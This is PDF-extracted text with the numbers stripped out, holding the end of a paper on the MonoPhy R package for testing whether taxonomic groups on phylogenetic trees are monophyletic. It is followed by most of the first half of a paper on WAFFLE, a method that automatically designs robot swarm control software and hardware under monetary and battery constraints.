proposing monophyletic subgroups, enabling formal tests for monophyly (incorporating clade support) and providing increased plot customizability. examples our first example makes use of the example files contained in the package. they come from a phylogeny of the plant family ericaceae (schwery et al., pruned to species; for schwery and o’meara ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://cran.r-project.org/package=monophy/ https://github.com/oschwery/monophy http://dx.doi.org/ . /peerj-cs. 
original data, see schwery et al., ) and two taxon files assigning tribes and subfamilies to the tips (in both files, errors have been introduced for demonstration purposes; see code and output for both examples in supplemental information ). running the main analysis command assessmonophyly on genus level (i.e., tree only) and tribe level (i.e., tree plus taxonomy file) using standard settings took . and . s respectively on a macbook pro with . ghz intel core i and gb ram. we could now use the remaining commands to extract the information of interest from the saved output object (e.g., summary tables, lists of problem taxa, etc.). the basic monophyly plot for the genus level analysis is displayed for a subclade of the tree in fig. (the figure of the full tree is shown in fig. s ). for the second example, we demonstrate the package’s performance on a tree of , species of embriophyta (zanne et al., ; data see zanne et al., ), using an outlier- cutoff of . this time. just checking monophyly for genera took . h, but revealed that % of genera on the tree are not monophyletic, while around half of all genera are only represented by one species each. furthermore, we can see that the largest monophyletic genus is iris ( tips), that justicia had the most intruders ( tips) and that acacia produced the most outliers ( tips). finally, with , other tips as descendants of their mrca, the species of aldina are most spread throughout the tree. citation researchers using monophy in a published paper should cite this article and indicate the used version of the package. the citation information for the current package version can be obtained using citation(‘‘monophy’’). acknowledgements we want to thank the members of the o’meara lab for helpful discussions, frederik matsen iv and two anonymous reviewers for well-considered criticism to improve the manuscript, brian looney and sam borstein for beta testing, and the members of the tank lab, arne mooers, karen cranston, bruce cochrane and daniel gates for great ideas on increasing the usefulness of this package. additional information and declarations funding this work has been supported via a gta to os by the university of tennessee, knoxville. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: university of tennessee, knoxville. competing interests the authors declare there are no competing interests. schwery and o’meara ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. author contributions • orlando schwery conceived and designed the experiments, performed the experiments, analyzed the data, contributed materials/analysis tools, and wrote the paper, prepared figures and tables, performed the computation work. • brian c. o’meara contributed materials/analysis tools, and wrote the paper. data availability the following information was supplied regarding data availability: cran: https://cran.r-project.org/package=monophy/ github: https://github.com/oschwery/monophy. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references avise jc, arnold j, ball rm, bermingham e, lamb t, neigel je, reeb ca, saunders nc. . 
intraspecific phylogeography—the mitochondrial-dna bridge between population-genetics and systematics. annual review of ecology and systematics : – doi . /annurev.es. . . . chamberlain sa, szocs e. . taxize: taxonomic search and retrieval in r. f research : – doi . /f research. - .v . coddington ja. . cladistic tests of adaptational hypotheses. cladistics : – doi . /j. - . .tb .x. czelusniak j, goodman m, hewettemmett d, weiss ml, venta pj, tashian re. . phylogenetic origins and adaptive evolution of avian and mammalian hemoglobin genes. nature : – doi . / a . dalevi d, desantis tz, fredslund j, andersen gl, markowitz vm, hugenholtz p. . automated group assignment in large phylogenetic trees using grunt: grouping, ungrouping, naming tool. bmc bioinformatics : . donoghue mj. . phylogenies and the analysis of evolutionary sequences, with examples from seed plants. evolution : – doi . / . felsenstein j. . confidence limits on phylogenies: an approach using the bootstrap. evolution : – doi . / . fitzjohn rg. . diversitree: comparative phylogenetic analyses of diversification in r. methods in ecology and evolution : – doi . /j. - x. . .x. gilinsky nl, good ij. . probabilities of origination, persistence, and extinction of families of marine invertebrate life. paleobiology : – . hey j. . using phylogenetic trees to study speciation and extinction. evolution : – doi . / . schwery and o’meara ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://cran.r-project.org/package=monophy/ https://github.com/oschwery/monophy http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /annurev.es. . . http://dx.doi.org/ . /f research. - .v http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . / a http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /j. - x. . .x http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. larget b, simon dl. . markov chain monte carlo algorithms for the bayesian analysis of phylogenetic trees. molecular biology and evolution : – doi . /oxfordjournals.molbev.a . matsen f, gallagher a. . reconciling taxonomy and phylogenetic inference: formalism and algorithms for describing discord and inferring taxonomic roots. algorithms for molecular biology ( ): . mcdonald d, price mn, goodrich j, nawrocki ep, desantis tz, probst a, andersen gl, knight r, hugenholtz p. . an improved greengenes taxonomy with explicit ranks for ecological and evolutionary analyses of bacteria and archaea. isme journal : – doi . /ismej. . . neuwirth e. . rcolorbrewer: colorbrewer palettes. r package version . - . ed. paradis e, claude j, strimmer k. . ape: analyses of phylogenetics and evolution in r language. bioinformatics : – doi . /bioinformatics/btg . r development core team. . r: a language and environment for statistical comput- ing. vienna: r foundation for statistical computing. available at http://www.r- project.org/ . rabosky dl. . automatic detection of key innovations, rate shifts, and diversity- dependence on phylogenetic trees. plos one :e doi . /journal.pone. . revell lj. . phytools: an r package for phylogenetic comparative biology (and other things). methods in ecology and evolution : – doi . /j. - x. . .x. robinson df. . comparison of labeled trees with valency three. journal of combina- torial theory, series b : – doi . / - ( ) - . schliep kp. . phangorn: phylogenetic analysis in r. bioinformatics : – doi . /bioinformatics/btq . 
schwery o, onstein re, bouchenak-khelladi y, xing y, carter rj, linder hp. . data from: as old as the mountains: the radiations of the ericaceae. dryad digital repository doi . /dryad.t fg . schwery o, onstein re, bouchenak-khelladi y, xing y, carter rj, linder hp. . as old as the mountains: the radiations of the ericaceae. new phytologist : – doi . /nph. . shochat d, dessauer hc. . comparative immunological study of albumins of anolis lizards of the caribbean islands. comparative biochemistry and physiology a- physiology : – doi . / - ( ) - . sibley cg, ahlquist je. . the phylogeny and relationships of the ratite birds as indicated by dna-dna hybridization. in: evolution today. proceedings of the second international congress of systematic and evolutionary biology, – . zanne ae, tank dc, cornwell wk, eastman jm, smith sa, fitzjohn rg, mcglinn dj, o’meara bc, moles at, reich pb, royer dl, soltis de, stevens pf, westoby m, wright ij, aarssen l, bertin ri, calaminus a, govaerts r, hemmings f, leishman mr, oleksyn j, soltis ps, swenson ng, warman l, beaulieu jm. . three keys schwery and o’meara ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /oxfordjournals.molbev.a http://dx.doi.org/ . /oxfordjournals.molbev.a http://dx.doi.org/ . /ismej. . http://dx.doi.org/ . /bioinformatics/btg http://www.r-project.org/ http://www.r-project.org/ http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j. - x. . .x http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /bioinformatics/btq http://dx.doi.org/ . /bioinformatics/btq http://dx.doi.org/ . /dryad.t fg http://dx.doi.org/ . /nph. http://dx.doi.org/ . /nph. http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /peerj-cs. to the radiation of angiosperms into freezing environments. nature : – doi . /nature . zanne ae, tank dc, cornwell wk, eastman jm, smith sa, fitzjohn rg, mcglinn dj, o’meara bc, moles at, reich pb, royer dl, soltis de, stevens pf, westoby m, wright ij, aarssen l, bertin ri, calaminus a, govaerts r, hemmings f, leishman mr, oleksyn j, soltis ps, swenson ng, warman l, beaulieu jm, ordonez a. . data from: three keys to the radiation of angiosperms into freezing environments. dryad digital repository doi . /dryad. q . . schwery and o’meara ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nature http://dx.doi.org/ . /nature http://dx.doi.org/ . /dryad. q . http://dx.doi.org/ . /peerj-cs. submitted july accepted august published september corresponding author mauro birattari, mbiro@ulb.ac.be academic editor josé manuel galán additional information and declarations can be found on page doi . /peerj-cs. copyright salman et al. distributed under creative commons cc-by . open access concurrent design of control software and configuration of hardware for robot swarms under economic constraints muhammad salman, antoine ligot and mauro birattari iridia, université libre de bruxelles, brussels, belgium abstract designing a robot swarm is challenging due to its self-organized and distributed nature: complex relations exist between the behavior of the individual robots and the collective behavior that results from their interactions. in this paper, we study the concurrent automatic design of control software and the automatic configuration of the hardware of robot swarms. 
we introduce waffle, a new instance of the automode family of automatic design methods that produces control software in the form of a probabilistic finite state machine, configures the robot hardware, and selects the number of robots in the swarm. we test waffle under economic constraints on the total monetary budget available and on the battery capacity of each individual robot comprised in the swarm. experimental results obtained via realistic computer-based simulation on three collective missions indicate that different missions require different hardware and software configuration, and that waffle is able to produce effective and meaningful solutions under all the experimental conditions considered. subjects adaptive and self-organizing systems, agents and multi-agent systems, artificial intelligence, robotics keywords swarm robotics, automatic design, collective behaviors, concurrent design introduction in this paper, we make a two-fold contribution: (i) we address the concurrent automatic design of control software and the automatic configuration of the hardware; and (ii) we study an automatic design problem that is subject to economic constraints. in swarm robotics (Şahin, ), a group of robots coordinate to accomplish missions that a single robot cannot accomplish. in a swarm, robots do not have predefined roles, neither do they possess any global information, nor do they rely on external infrastructures (dorigo, birattari & brambilla, ). they operate in a decentralized and self-organized manner, relying only on local information gathered through their sensors or communicated by their neighboring peers. a robot swarm is a collective entity and cannot be programmed directly: the designer must program the individual robots so that, together, they perform the desired mission. the design process is laborious due to the complex relation existing between the behavior of the individual robots and the collective behavior that results from their interactions (brambilla et al., ). the most common approach to designing a robot swarm is trial-and-error: a time consuming approach in which individual-level behaviors are implemented, tested, and modified until how to cite this article salman m, ligot a, birattari m. . concurrent design of control software and configuration of hardware for robot swarms under economic constraints. peerj comput. sci. :e http://doi.org/ . /peerj-cs. mailto:mbiro@ulb.ac.be https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. the desired swarm-level behavior is obtained. although a number of swarms have been successfully designed with this approach, it heavily depends on the experience of designer, it is error-prone, and its results are not reproducible. to overcome these issues, a number of principled manual design methods have been proposed. however, these methods are limited in scope: a universal swarm design methodology does not exist, yet (hamann & wörn, ; lopes et al., ; brambilla et al., ). automatic design is an alternative approach to designing a swarm. in automatic design, the design problem is formulated as an optimization problem that is then solved with an optimization algorithm (birattari et al., ). a design problem of a collective mission is expressed as an objective function, a mathematical equation that measures the performance of the robot swarm. 
an optimization algorithm steers the search for a control software of an individual-robot that maximizes the performance of the swarm, taking into account the constraints such as hardware limitations of the robots or other environmental restrictions, that are encoded in the form of additional (in)equalities. neuro-evolutionary robotics is the most studied among the existing automatic design approaches to design a swarm (trianni, ). this approach uses an evolutionary algorithm to optimize the control software of robots that, in this case, is represented by an artificial neural network (nolfi & floreano, ). recently, a number of automatic design approaches have been proposed that use different control software structures and optimization algorithms than those typically adopted in evolutionary swarm robotics (francesca et al., ). the concurrent development of control software and hardware is a further step to reduce the human involvement in the design process. a number of concurrent design methods have been proposed for single-robot applications: in addition to designing the control software, they select and configure sensors and actuators and/or the robot’s morphology (sims, ; lipson & pollack, ). these concurrent design methods have significantly increased the performance and versatility of the designed robots. in swarm robotics, only a few research articles have been published that studied the concurrent automatic design of control software and configuration of the hardware (watson & nitschke, ). details are provided in the state of the art section. in general, designing implies solving trade-offs, that is, balancing multiple, possibly conflicting factors (pahl et al., ). in swarm robotics, a characterizing example of a trade-off to be handled is the one between the number of robots comprised in the swarm and the capabilities of each individual robot. the designer must decide whether, for the specific mission at hand, they should use (i) few highly capable robots or (ii) many relatively incapable ones. this trade-off originates from the constraint of a limited monetary budget. indeed, it is reasonable to assume that highly capable robots are more expensive than relatively incapable ones. another example of a design trade-off originates if the designer is given the constraint of adopting a battery of a predefined capacity. under this constraint, the designer might chose to adopt (i) robots with powerful sensors and actuators that can achieve relatively more per unit time, but have a high power consumption and therefore can operate for a relatively short amount of time; or (ii) simpler robots that can achieve relatively less per unit time but have a low power consumption and therefore can operate salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. for a relatively long amount of time. it is reasonable to expect that the choice might depend on the specific mission at hand. in this research, we introduce waffle, a new instance of the automode family of automatic design methods. all previously published instances of automode generate control software for the e-puck platform (mondada et al., ) by selecting, combining, and fine-tuning predefined, mission-independent software modules (francesca et al., ; francesca et al., ; kuckling et al., ; hasselmann, robert & birattari, ). waffle is based on chocolate (francesca et al., ). 
indeed, regarding the conception of control software, waffle is identical to chocolate: the two methods share the same predefined software modules, they combine these modules into the same control software architecture, and they use the same optimization algorithm—details are given in the automode- waffle section. the novelty of waffle is the concurrent hardware configuration of the robot swarm: waffle automatically selects the hardware configuration of the individual robots and the number of robots within the swarm. the goal of this research is to show that it is possible to concurrently design the control software and configure the hardware for robot swarm using the principles of automatic modular design: the idea that control software and, in our particular case the hardware, can be produced by combining pre- existing modules that are mission independent and that are assembled and fine tuned automatically. in this specific study, we consider some hypothetical hardware modules that enable a robot to detect and locate its neighboring peers. these hypothetical modules are based on infrared transceivers and are variants of an existing hardware module for the e-puck platform (mondada et al., ) known as the range-&-bearing (gutiérrez et al., ). we define the set of these hypothetical modules so that some of them are more-capable and some are less-capable than the existing one in terms of perception range and detection abilities. we assume that the more capable hardware modules are more expensive and consume more power. these hypothetical modules are realistic and possibly implementable. the fact that they are hypothetical (except one) does not impair the significance of our research. indeed, our goal is not to solve a specific design problem but rather to show that a modular approach to designing by optimization can search the space of possible hardware configurations concurrently with the automatic design of control software. we study waffle under what we shall collectively call economic constraints, namely, constraints on the total monetary budget available and on the battery capacity of each individual robot comprised in the swarm. if these constraints were not included, the study would produce trivial results in many cases. indeed, in many cases, the automatic design process would produce swarms comprising the largest number of robots possible, each equipped with the best performing, most expensive, and most energy-consuming hardware modules. besides preventing that the study produces trivial results, these constraints have a value on their own. indeed, in a prospective practical application of automatic design, one will be necessarily faced with economic constraints, which are an essential, unavoidable element of any real-world design problem. to the best of our knowledge, this study is the first one in which automatic design of robot swarms is studied under constraints of economical nature. in this sense, our work contributes to moving a step in the direction of the practical application of automatic design. salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the main research question that we address in this paper is the following: can waffle select mission-specific hardware together with an appropriate control software? to do so, we test waffle on three different collective missions: end-time-aggregation, anytime- selection, and foraging. for each mission, we impose constraints to the design process. 
namely, we impose a monetary budget and/or a battery capacity. for each mission, we perform nine different experiments: (i) one experiment in which both monetary budget and battery capacity are unconstrained (no-constraint), (ii) two experiments with different levels of the monetary budget and unconstrained battery capacity (monetary-constraint), (iii) two experiments with different levels of battery capacity and unconstrained monetary budget (power-constraint), and (iv) four experiments with different levels of monetary budget and battery capacity (monetary-&-power-constraint). for each experiment, we report and discuss (i) a measure of the performance achieved, (ii) the number of robots comprised in the automatically designed swarm, (iii) which hardware modules have been automatically selected, and (iv) which software modules were adopted. state of the art in the literature, a number of approaches have been proposed to address the concurrent design of single robots. however, only a few preliminary studies have been published that implement the simultaneous design of hardware and control software for a robot swarm. in single robot applications, sims ( ) introduced what he called virtual creatures: simulated robots whose body and control software are designed simultaneously to perform different tasks, such as walking, jumping, and swimming. the body of these robots is composed of solid cuboid segments connected by different joint types, actuators to simulate muscle force at joints, and various sensors. the body of a robot is represented as a directed-graph of nodes and connections that contain the connectivity information and developmental instructions. the control software of the robot is implemented as an artificial neural network. a genetic algorithm was used to concurrently design the software and the hardware of a robot for a particular task. the development of virtual creatures demonstrated the ability of this approach to design complex systems that would be complicated to design using traditional methods. lipson & pollack ( ) took this concept to a further level by introducing the automatic manufacturing of the concurrently designed robot. the authors used the rapid prototyping technology to d print the robot once its body (variable-length bars, and ball-and-socket joints) and control software (artificial neural network) is automatically designed in the simulation. in recent studies, much work has been conducted using similar approaches that aim to address various design problems, e.g., robots with insect-like hardware topologies and behaviors (hornby, lipson & pollack, ); visually guided robots (macinnes, ); aquatic robots (clark et al., ); self-reconfiguring robot (nygaard et al., ). in swarm robotics, only a couple of studies are available that use concurrent design methods to design a robot swarm. watson & nitschke ( ) studied the impact of the number of sensors and their position on the robot to select the minimal sensor configuration of individual robot for a collective construction task. they achieved that by manually salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. selecting six different sensors configurations and generating six instances of control software in the form of artificial neural networks using hyperneat. hewland & nitschke ( ) used neat-m to configure the number and types of sensors simultaneously with the control software for the robots in a swarm for collective construction task. 
moreover, they also designed the control software for a robot swarm with fixed hardware configuration. according to the authors, the concurrently designed swarm performed relatively better than the swarm with fixed hardware configuration. heinerman, rango & eiben ( ) studied the relationship between individual and social learning in physical robot swarms. the authors used six thymio ii robots in their experiments. the study shows that the on-line social learning in a physical robot swarm is possible, the design process is faster than individual learning, and the performance of the produced control software (artificial neural networks) is higher. moreover, the design process also configures a suitable sensory layout for individual robots. various computational models have been proposed to estimate the impact of the size/density of the robot swarm on its performance (lerman & galstyan, ; hamann, ). however, we are not aware of any study in which the automatic selection of the number of robots for a swarm has been attempted. to the best of our knowledge, the implications of imposing economical constraints to the automatic design of a robot swarm have never been studied. we are only aware of a single study that goes into that direction: recently, carlone & pinciroli ( ) included some practical constraints in the design of a robot swarm. they formulate the co-design of a single race-drone and multi-drone system as a binary optimization problem that allows specifying constraints such as the total design budget. automode-waffle as already mentioned above, waffle belongs to automode, a family of off-line automatic methods for designing the control software of robot swarms (francesca et al., ). in automode, control software is generated by automatically assembling predefined modules and by fine-tuning their free parameters. a number of methods have been proposed that belong to automode: vanilla (francesca et al., ), chocolate (francesca et al., ), gianduja (hasselmann, robert & birattari, ), and maple (kuckling et al., ). each of these methods is characterized by a specific set of predefined modules, a software architecture into which these modules can be combined, and an optimization algorithm that searches the space of the possible ways in which modules can be combined into the given architecture and the space of the free parameters. all the aforementioned methods generate control software for a specific version of the e-puck platform (mondada et al., ). moreover, they all limit themselves to the generation of control software: the hardware configuration of the e-puck robot is fixed and the number of robots comprised in the swarm is given as a requirement of the mission to be performed. waffle is a further step to increase the flexibility of automode and to reduce the human involvement in the design process. indeed, waffle concurrently develops the control software and configures the hardware of the robot swarm—including the number salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table low-level behaviors and conditions used in waffle. low-level behaviors exploration the robot moves straight. 
if an obstacle is detected, the robot rotates in place for a random amount of time before moving straight again.
- stop: the robot does not move.
- phototaxis: the robot moves towards the light, if perceived; otherwise, it moves straight.
- anti-phototaxis: the robot moves away from the light, if perceived; otherwise, it moves straight.
- attraction*: the robot moves towards peers within its perception range.
- repulsion*: the robot moves away from peers within its perception range.
conditions
- black-floor: black floor is detected.
- gray-floor: gray floor is detected.
- white-floor: white floor is detected.
- neighbor-count*: the number of peers in the neighborhood is greater than a parameter.
- inverted-neighbor-count*: the number of peers in the neighborhood is less than a parameter.
- fixed-probability: the transition is enabled with a fixed probability.
notes: * behaviors and conditions that use the range-&-bearing module.

of robots comprised. regarding the design of control software, waffle is identical to chocolate (francesca et al., ): the two methods share the same set of pre-defined software modules; generate control software in the form of probabilistic finite state machines; and use the iterated f-race optimization algorithm (lópez-ibáñez et al., ) to select, combine, and fine-tune the software modules. the set of software modules is composed of six low-level behaviors and six conditions (francesca et al., ). a behavior is an operation or action that a robot can perform, while a condition is a criterion to switch from one behavior to another. behaviors and conditions have parameters that impact their internal functioning: automode fine-tunes these parameters to the specific mission to be performed. multiple instances of the same behavior might coexist in a probabilistic finite state machine, possibly with different values of the parameters. in waffle (as in chocolate), states and edges of a probabilistic finite state machine are instances of behaviors and conditions, respectively. the design process can include a maximum of four states and each state can have at most four outgoing edges. a brief description of the software modules is given in table and a typical probabilistic finite state machine is shown in fig. .

regarding the hardware, waffle uses iterated f-race to define the configuration of the individual e-puck robots and their number within the swarm. the e-puck is a differential drive robot that is widely used in swarm robotics research (mondada et al., ). waffle and all previous instances of automode operate with an extended version of the e-puck robot, which adopts: (i) the overo gumstix, to run linux
/fig- on the robot, (ii) three ground sensors, located under its body, to detect the gray-level color of the floor beneath it, and (iii) a range-&-bearing module (gutiérrez et al., ) to detect neighboring peers and have knowledge of their relative position. we simulate the e-puck robots using argos (pinciroli et al., ; garattoni et al., ), an open source multi-engine simulator for robot swarm. we use argos’ d dynamic physics engine to simulate the robots and the environment. here, we assume that e-puck robots are formally described by reference model rm . (hasselmann et al., ), which defines the input and output variables of corresponding sensors and actuators—see table . these variables can be read/written by the control software at every control step, that is, every ms. the control software detects the obstacles (proxi) and the presence and relative position of a light source (light i) using eight infrared transceivers. it also detects the gray-level color of the floor (groundj) beneath the robot using ground sensors. at every control step, all robots in the swarm broadcast a ‘‘heartbeat’’ signal using their range-&-bearing module. this signal encodes the sender’s unique id. every robot receives the heartbeat signals of the peers that are in its perception range and has therefore knowledge of their number (n), and of their aggregate relative position (v ) which is defined as: v =   n∑ m= ( +rm , bm ) , if robots are perceived; ( , ), otherwise. ( ) here, rm and bm are the range and bearing of the mth neighboring peer, respectively. for a detailed description of the vector v and of how it is computed, see salman, ligot & birattari ( ). eventually, the control software actuates the wheels of the robot by setting the right and left wheel velocity (vr and vl). salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table reference model rm . . sensor input value description proximity proxi∈{ ,..., } [ , ] reading of proximity sensor i light light i∈{ ,..., } [ , ] reading of light sensor i ground groundj∈{ , , } {black,gray,white} reading of ground sensor j range-&-bearing n [ , ] number of neighboring robots perceived v ([ . , ],[ , π]) their aggregate position actuator output value description motors vk∈{l,r} [− . , . ] ms− target linear wheel velocity as mentioned above, the goal of this research is to concurrently develop the control software and configure the hardware for the robot swarm. concerning the hardware configuration, waffle configures the range-&-bearing transceiver modules of e-puck robots. to do so, we simulate six range-&-bearing receivers and two range-&-bearing transmitters as listed in table . these range-&-bearing modules are hypothetical but are variants of one that actually exists (gutiérrez et al., ): receiver r rb coupled with transmitter t rb, as defined in table . each hypothetical range-&-bearing receiver and transmitter has distinct characteristics. a receiver is characterized by an error modeled as white noise in the estimation of the angle of a broadcasting peer (bearing error), and a probability to fail to receive the signal broadcast by a robot in its perception range (loss probability). the bearing error is sampled at every time step from a uniform distribution. the loss probability is a function of the number of neighboring peers—details are given as supplementary material (salman, ligot & birattari, ). 
a range-&-bearing transmitter is characterized by a tunable infra-red transmission range (r)—see table . if the design process finds the range-&-bearing necessary for a mission, it can equip all the robots with one of the receiver and of the transmitter configurations listed in table . in configuring the hardware of the robot swarm, the design process must also respect the available monetary budget and/or a battery capacity. indeed, the range-&-bearing receivers and transmitters are also characterized by price and current rating—see table . experimental setup in this section, we describe the three collective missions, the experiments we perform for each mission, and the protocol we follow to test waffle. missions we test waffle on three missions: anytime-selection, end-time-aggregation, and foraging. all three missions are to be performed in a dodecagonal arena of . m . the arena is divided into different zones according to the requirements of a mission. anytime-selection and end-time-aggregation are performed in the same arena—as shown in fig. a. at the beginning of every experimental run, we randomly position the robots everywhere in the arena. salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table extended range-&-bearing receiver and transmitter modules. the bearing error is modeled as white noise in the estimation of the bearing of a broadcasting peer and is sampled from a uniform proba- bility distribution, of which we list here the extremes of the support. the loss probability is a function of the number of neighboring peers, of which we list here the minimum, average, and maximum values. range-&-bearing bearing error loss probability price current rating receivers rxrb ± deg min−avg −max px (€) ix (ma) ∅ − − r rb . − . − . r rb . − . − . r rb . − . − . r rb . − . − . r rb . − . − . r rb . − . − . , range-&-bearing range price current rating transmitters tyrb r (m) py (€) iy(r) (ma) ∅ − t rb { . , . , . } { , , } t rb { . , . } { , } figure argos representation of arenas with dimensions and positions of different zones: (a) end- time-aggregation and anytime-selection, and (b) foraging. measurements are expressed in me- ters. in foraging, l represents a light source. full-size doi: . /peerjcs. /fig- anytime-selection the robot swarm must aggregate in one of the two circular black zones. the size of two black zones and their position in the arena are given in fig. a. the performance of the swarm is measured by the following objective function: fa= t∑ t= ∣∣(na(t)−nb(t))∣∣, ( ) salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. where na(t) and nb(t) are the number of robots in zone a and b at any time t; t is the total duration of the experiment. in anytime-selection, the performance is measured at every control step. due to this reason, the robots are expected to promptly aggregate in one of the black zones and stay there until the end of the experiment. end-time-aggregation the robots must aggregate in one of the two black zones. the dimensions of two black zones and their position in the arena are given in fig. a. the performance of the robot swarm is measured with the following objective function: fe = ∣∣na(t)−nb(t)∣∣, ( ) where t is the duration of an experiment and na(t) and nb(t) are the number of robots in zone a and zone b at time t . 
unlike anytime-selection, the performance in end-time-aggregation is computed at the end of the experiment. due to this reason, the robots can take some time to explore the arena and converge in a black zone: the experiment duration is not a significant constraint in this mission. however, the real challenge is to keep the robots assembled in a zone until the end of the experiment. foraging the swarm must collect a maximum number of objects from two sources and drop them in the nest. we abstract the foraging experiment by considering that an object is retrieved when an individual robot visits a source, and an object is dropped when a robot visits the nest. the two sources in the arena are represented as two black zones, while the nest is represented as a white zone. a light is also placed behind the nest as a cue for robots. the dimensions and position of the two source zones and nest are given in fig. b. the performance of the robot swam, the number of objects (no) retrieved by the swarm, is expressed by the following objective function: ff =no. ( ) in foraging, an individual robot can retrieve a single object at a time. therefore, the performance of the swarm heavily rely on the number of robots and on the duration of the experiment. experiments we perform nine different experiments for each mission. in these experiments, we impose a monetary budget and/or a battery capacity constraints to the design process. depending on the type of constraint, an experiment can be classified as belonging to one of four categories: no-constraint, monetary-constraint, power-constraint, and monetary-&- power-constraint. the levels of the monetary constraint, levels of battery capacity, and duration of the experiments are listed in table . for each experiment, the design process is free to choose any number of robots between and . salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table monetary budget levels, battery capacity levels and duration of all nine experiments of four categories. the duration of an experiment, t , from categories power-constraint and monetary-&-power- constraint is not fixed. the experiment terminates, when all robots are out of battery—as defined in eq. ( ). experiment category monetary budget battery capacity duration nc no-constraint unconstrained unconstrained s m , € unconstrained s m monetary constraint , € unconstrained s p unconstrained mah t p power constraint unconstrained mah t m p , € mah t m p , € mah t m p , € mah t m p monetary & power constraint , € mah t no-constraint this experiment (nc) is performed without any constraint: the monetary resources and battery capacity are unconstrained. monetary-constraint in these experiments, the limited resource is the monetary budget, mlimit , available to purchase the robots and range-&-bearing modules. the design process only considers the combinations of hardware modules that keep the total cost of the swarm, pswarm, equal or below the available monetary budget—i.e, pswarm≤mlimit . the total swarm cost, pswarm, is computed with the following equation: pswarm=n × ( pr +px+py ) , ( ) here n is the total number of robots in swarm, that is, to robots; pr is the price of extended version of e-puck without range-&-bearing modules, that is, , €; px and py are the prices of a range-&-bearing receiver and a range-&-bearing transmitter respectively—see table . 
the minimum cost of a swarm is , €, when the minimum number of robots are equipped with the least-capable range-&-bearing receiver and transmitter modules. the maximum cost of a swarm is , €, when the maximum number of robots are equipped with the most-capable range-&-bearing receiver and transmitter modules. for each mission, we perform two experiments, m and m , where the monetary budget is , € and , € respectively—see table . power-constraint in these experiments, the limited resource is the battery capacity, pbc. there is no constraint on the monetary resources: the design process can choose any combination of the range-&- bearing modules and the number of robots between and —see table . the operation time, tr, of each robot in the swarm depends on its hardware configuration, available battery capacity, and the execution of the individual-level behaviors. the operation time salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of a robot can be computed by the following equation: tr = (pbc× ) (icpu+ilm+irm+iy(r)+ix) , ( ) where icpu is the current rating of robot’s cpu and other fixed sensors, that is, ma. the cpu and other fixed hardware modules will always consume the same power. ilm and irm are the current ratings of the left and the right motors of the robot, that is, ma at maximum speed. ix and iy(r) are the current ratings of range-&-bearing receiver and transmitter modules respectively. r is the range of range-&-bearing transmitter—see table . the experiment terminates, when every robot in the swarm consumes its battery power. the total experiment time, t , is expressed as: t =max ( tr∈{ , , ,...,n} ) . ( ) for each mission, we perform two experiments with different levels of battery capacities: p and p —see table . monetary-&-power-constraint in these experiments, both monetary budget and battery capacity are limited. the design process is required to choose the hardware modules that are not only affordable but also allow robots to operate for a sufficient amount of time. for each mission, we perform four experiments with dual constraints: m p , m p , m p , and m p —see table . protocol the experiments are performed without any human intervention. the design of control software and the configuration of hardware is the result of an automatic design process. for each experiment, we run independent design processes to get hardware configurations and their respective control software in the form of a finite state machine. each design process is run with the design budget of , simulations. the performance of the designs are evaluated via a single run of each design. for each experiment, we report (i) the performance achieved by the swarm, the number of robots comprised in the automatically designed swarm, the hardware modules that have been automatically selected, and the adopted software modules. results in this section, we present the results on a per-mission basis. the instances of control software generated, the data collected, and videos of the experiments are available as online supplementary material (salman, ligot & birattari, ). anytime-selection the performance of an automatically designed swarm depends on the number of robots that reach the black zone and on the moment in which each of them does so: the longer a robot remains on the black zone, the higher the contribution it makes to the score. 
